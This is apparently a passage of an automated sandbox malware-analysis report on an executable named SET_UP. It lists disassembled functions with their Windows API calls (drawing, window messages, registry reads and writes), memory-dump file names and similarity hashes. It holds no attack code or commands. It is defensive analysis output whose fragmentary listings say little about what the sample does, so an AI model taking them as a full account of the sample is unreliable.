                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00409C3C
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000000), ref: 00409C95
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DrawImageList_$ColorInflateRectText__ftol
                                                                                                                                                                                                  • String ID: audio
                                                                                                                                                                                                  • API String ID: 1229794287-410859157
                                                                                                                                                                                                  • Opcode ID: 5056b181c1c96504bbe3fe1884ae486a0d9eb0e3f0563b50a9667ecb7f691575
                                                                                                                                                                                                  • Instruction ID: bbe5c1424f7f6be040fa121057891488958217719064435e28c3a0437eb8e737
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5056b181c1c96504bbe3fe1884ae486a0d9eb0e3f0563b50a9667ecb7f691575
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC19B32A00109EFDF05DF68C889AEEB7B6FF49310F04802AF915AB291D775AD45CB94
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 004A8910
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004A891C
                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 004A8931
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A893C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastType
                                                                                                                                                                                                  • String ID: @$H
                                                                                                                                                                                                  • API String ID: 1809617866-104103126
                                                                                                                                                                                                  • Opcode ID: bd4b47cba76a7a305c3128ebad9f95517d9cbc88c7c2af01c67b16adb4f56ce7
                                                                                                                                                                                                  • Instruction ID: 8f1da54f663758aef70ce60561b7db3f7c220e6258dced4633ab35b5840e3427
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd4b47cba76a7a305c3128ebad9f95517d9cbc88c7c2af01c67b16adb4f56ce7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B18128718042499AEF246B588C447BF7B64EF33368F64462FE8116B2D1CF7C8945C75A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040C86B
                                                                                                                                                                                                    • Part of subcall function 0041F066: GetModuleFileNameW.KERNEL32(?,00000000,000003FF), ref: 0041F0A2
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040C8CC
                                                                                                                                                                                                    • Part of subcall function 004B01E6: SendMessageW.USER32(?,0000104B,00000000,?), ref: 004B021A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040CA13
                                                                                                                                                                                                    • Part of subcall function 0041C59D: __EH_prolog.LIBCMT ref: 0041C5A2
                                                                                                                                                                                                    • Part of subcall function 004C4DCE: __EH_prolog.LIBCMT ref: 004C4DD3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologMessageSend$DecrementFileInterlockedModuleName
                                                                                                                                                                                                  • String ID: %s\%s$Backup$Data\File Types
                                                                                                                                                                                                  • API String ID: 4127239310-493203647
                                                                                                                                                                                                  • Opcode ID: 56127fed28ebc13f22c371980317d7c6610c64c4bb2ba93f70920b724f7331f0
                                                                                                                                                                                                  • Instruction ID: 1ac92478ccd4a68978141e2f220d119aa82b309995c4a9bf0ebb16eeaf250436
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56127fed28ebc13f22c371980317d7c6610c64c4bb2ba93f70920b724f7331f0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0519F71A00249EFCF14EBA5C985AEEBBB5EF18314F10456EF511A32A2CB385E04DB65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041520A
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415227
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415238
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415249
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 0041525A
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 0041530E
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 0041532D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$__ftol$Client
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1348164131-0
                                                                                                                                                                                                  • Opcode ID: 6ad16158a7037672bee329fe86346c9e08b022bcd8ad4d3b62a051858a39d2b5
                                                                                                                                                                                                  • Instruction ID: ec047a174ae6a4628e80e23085a6ee7d5093783324aeece9a468a82e60cf12d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad16158a7037672bee329fe86346c9e08b022bcd8ad4d3b62a051858a39d2b5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51FB71A00B08EFCB64CFB9C984BDAB7F6FB84344F51892ED4AA93210DB706944CB55
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004143D1
                                                                                                                                                                                                    • Part of subcall function 004B9853: __EH_prolog.LIBCMT ref: 004B9858
                                                                                                                                                                                                    • Part of subcall function 004B9853: GetDC.USER32(?), ref: 004B9881
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00414403
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041444C
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?,?,?), ref: 00414538
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompatibleCreateH_prolog$BitmapImageList_Masked
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 3237123024-514139165
                                                                                                                                                                                                  • Opcode ID: bb89efb10ffc2b258e50ca399788dbf67c979eca88fd85f5f9a74f0785389662
                                                                                                                                                                                                  • Instruction ID: 39846ed70d51f3bdd042e514158308d3c28c620d7d4503cc53b083f5d4ca0e6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb89efb10ffc2b258e50ca399788dbf67c979eca88fd85f5f9a74f0785389662
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA515C71D00119AFDF05DFE8C996AEEBBB4EF05304F10416AF501A7281DB78AE45CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00414589
                                                                                                                                                                                                    • Part of subcall function 004B9853: __EH_prolog.LIBCMT ref: 004B9858
                                                                                                                                                                                                    • Part of subcall function 004B9853: GetDC.USER32(?), ref: 004B9881
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004145BB
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00414604
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?,?,?), ref: 004146F0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CompatibleCreateH_prolog$BitmapImageList_Masked
• String ID: <L$VGL
• API String ID: 3237123024-514139165
• Opcode ID: 09e61968e60e0303f8956f879f2adb7231567397d1f8228ec8e824efa3b4ac6c
• Instruction ID: ef56c3fe8e1687ceb0cc115731e1c8fb5f00a03b187b6d3c4346f85c6aaa52ee
• Opcode Fuzzy Hash: 09e61968e60e0303f8956f879f2adb7231567397d1f8228ec8e824efa3b4ac6c
• Instruction Fuzzy Hash: 75515C71D00109AFDF05DFE8C996AEEBBB8EF09304F10416AF501A7291DB789E45CB68
APIs
• GetParent.USER32(?), ref: 004B4FF5
• PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004B501E
• UpdateWindow.USER32(?), ref: 004B503A
• SendMessageW.USER32(?,00000121,00000000,?), ref: 004B5060
• SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 004B507F
• UpdateWindow.USER32(?), ref: 004B50C2
• PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004B50F5
  • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Message$Window$PeekSendUpdate$LongParent
• String ID:
• API String ID: 2853195852-0
• Opcode ID: 7711a24d4835398a3bca63de38c0f91caf1af2a0a1bc739449a73e7966803685
• Instruction ID: 6a62d8544b48f859d64db04fc3108f2d0370039e73a2eabbb58f4763c31b7b97
• Opcode Fuzzy Hash: 7711a24d4835398a3bca63de38c0f91caf1af2a0a1bc739449a73e7966803685
• Instruction Fuzzy Hash: 0D417130604B419FD730AF26C844FABFAE4EFD1B05F140A2EF48196291C779D905CBAA
APIs
• __EH_prolog.LIBCMT ref: 004C5B8E
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 004C5C3E
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 004C5C58
• RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004C5C74
• RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 004C5C89
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CloseEnumH_prologOpenQueryValue
• String ID: Software\
• API String ID: 2161548231-964853688
• Opcode ID: e5dcabf1e9d3071f94a221207040d20d9d93d85e64f69735385035064c7d9702
• Instruction ID: b9ed26cb46934d40732653e6896770cf18755b1c766b413f6634250aa2fb02d1
• Opcode Fuzzy Hash: e5dcabf1e9d3071f94a221207040d20d9d93d85e64f69735385035064c7d9702
• Instruction Fuzzy Hash: 04314F7590021AAEDF11EBA1CC95EFEBB79FF04314F50056EF511E2190DB78AA44CBA4
APIs
• GetCapture.USER32 ref: 00414CF5
• OffsetRect.USER32(?,00000000,?), ref: 00414D65
• InvalidateRect.USER32(00000000,00000000,00000000), ref: 00414D72
• GetParent.USER32(?), ref: 00414D8C
• PostMessageW.USER32(?,00000115,?,00000000), ref: 00414DB1
• UpdateWindow.USER32(?), ref: 00414DBA
• _TrackMouseEvent.COMCTL32(00000010,00000000,00000001), ref: 00414E00
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Rect$CaptureEventInvalidateMessageMouseOffsetParentPostTrackUpdateWindow
• String ID:
• API String ID: 28226273-0
• Opcode ID: c883d2d7f6609ceea994781507db43070c004bf1c2ba0bf192db29ef8040aa75
• Instruction ID: a0963d5c2e0f88895a4295760a70e05907c7cf04393ba3b51c0a4cb6bcb638a1
• Opcode Fuzzy Hash: c883d2d7f6609ceea994781507db43070c004bf1c2ba0bf192db29ef8040aa75
• Instruction Fuzzy Hash: AC31AE71200700DBDB249F75DD08FEABBA5AF84304F10482EF95AC7290DB78A841CB58
APIs
• GetParent.USER32(0040DFDC), ref: 004B43F3
• GetWindowRect.USER32(0040DFDC,0040DFDC), ref: 004B440D
• ScreenToClient.USER32(0040DFDC,0040DFDC), ref: 004B4420
• ScreenToClient.USER32(0040DFDC,?), ref: 004B4429
• EqualRect.USER32(0040DFDC,0040DFDC), ref: 004B4433
• DeferWindowPos.USER32(?,0040DFDC,00000000,?,C3C95B5E,24748B56,CE8B5708,00000014), ref: 004B445B
• SetWindowPos.USER32(0040DFDC,00000000,?,C3C95B5E,24748B56,CE8B5708,00000014,?,75C04A40,0040DFDC,0040DFDC,?,?), ref: 004B4473
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$ClientRectScreen$DeferEqualParent
• String ID:
• API String ID: 443303494-0
• Opcode ID: cf44b72f48d6369d305cfc0046c4ebbd92cae56da8398977a49c21bed73f74d9
• Instruction ID: c6f597895c3f52a46666eff5535548c03a0c0c0a4288fa53688e6089e96e037d
• Opcode Fuzzy Hash: cf44b72f48d6369d305cfc0046c4ebbd92cae56da8398977a49c21bed73f74d9
• Instruction Fuzzy Hash: 7B1151B6600209BFE7108F69DC48EBBBBBDEB88710F10852AB95593255E734ED11CB74
APIs
• GetWindowRect.USER32(?), ref: 004AD470
• GetWindowLongA.USER32(?,000000F0), ref: 004AD479
• InflateRect.USER32(?,00000001,00000001), ref: 004AD4D8
• GetParent.USER32(?), ref: 004AD4DF
• ScreenToClient.USER32(00000000,?), ref: 004AD4F3
• ScreenToClient.USER32(00000000,?), ref: 004AD4FB
• InvalidateRect.USER32(00000000,?,00000000), ref: 004AD511
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1809568455-0
                                                                                                                                                                                                  • Opcode ID: 463c9d304fe6eb307660a83f50751158f203e2dfe346b0102b753ef653a226fc
                                                                                                                                                                                                  • Instruction ID: 50ffc4d00ec097472926aa58dcd9e190b62d966b809761b4bfc8d12d6b38ca57
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463c9d304fe6eb307660a83f50751158f203e2dfe346b0102b753ef653a226fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D218E31A04305AFE714DF64C894F7B73A9EBA9724F40091EF65683291D738EC05CB26
APIs
• SystemParametersInfoW.USER32(00000030,00000000,00000000,00000000), ref: 00495C9B
• GetSystemMetrics.USER32(00000000), ref: 00495CB3
• GetSystemMetrics.USER32(00000001), ref: 00495CBA
• lstrcpyW.KERNEL32(-00000028,DISPLAY,00000028), ref: 00495CDE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: System$Metrics$InfoParameterslstrcpy
• String ID: B$DISPLAY
• API String ID: 1409579217-3316187204
• Opcode ID: 85bb01ca52ba363b3fa9cf2df10da74d41e311567bf4d1deebc7344da43dbf4f
• Instruction ID: 4760cfc774b0bca99e4c628b8fdc58c149daabb94a209b953cd605f1a26a71bd
• Opcode Fuzzy Hash: 85bb01ca52ba363b3fa9cf2df10da74d41e311567bf4d1deebc7344da43dbf4f
• Instruction Fuzzy Hash: 43110231600720ABCF129F65DC88A8BBFA8FF09711B204033FC04AE142D7B9D804CBA8
APIs
• SendMessageW.USER32(?,00001036,00000000,00000424), ref: 0040C6A9
• SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C6C6
• GetClientRect.USER32(?,?), ref: 0040C6D8
• GetSystemMetrics.USER32(00000002), ref: 0040C700
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: MessageSend$ClientMetricsRectSystem
• String ID: Extension$Name
• API String ID: 3399072733-2670291654
• Opcode ID: ae6f751ecd212605465e6f322b06151e8a662c8b06f0b6fc0bc4688ddc671d39
• Instruction ID: 5516346071384951d1090e1d5791696de537388447c7decd2c6349fd9b5c3c75
• Opcode Fuzzy Hash: ae6f751ecd212605465e6f322b06151e8a662c8b06f0b6fc0bc4688ddc671d39
• Instruction Fuzzy Hash: CF11C8313403447BEA307B799D46FAF7669EB80B14F10063DF652AB1D1CAB5A8048728
APIs
• __EH_prolog.LIBCMT ref: 0040D4C4
  • Part of subcall function 004BC38F: RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004BC3B3
  • Part of subcall function 004BC38F: RegCloseKey.ADVAPI32(00000000), ref: 004BC408
  • Part of subcall function 004BC31A: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,00000001,?,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC346
  • Part of subcall function 004BC31A: RegCloseKey.ADVAPI32(00000000,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC34F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Close$DeleteH_prologValue
• String ID: %s\%s$Data\File Types$Extension$Icon$Name
• API String ID: 1215613159-1963114798
• Opcode ID: 5656b2352a46bdfb2d43a6cfb516010bf3b6c067c8215d270e15ee12db318f5b
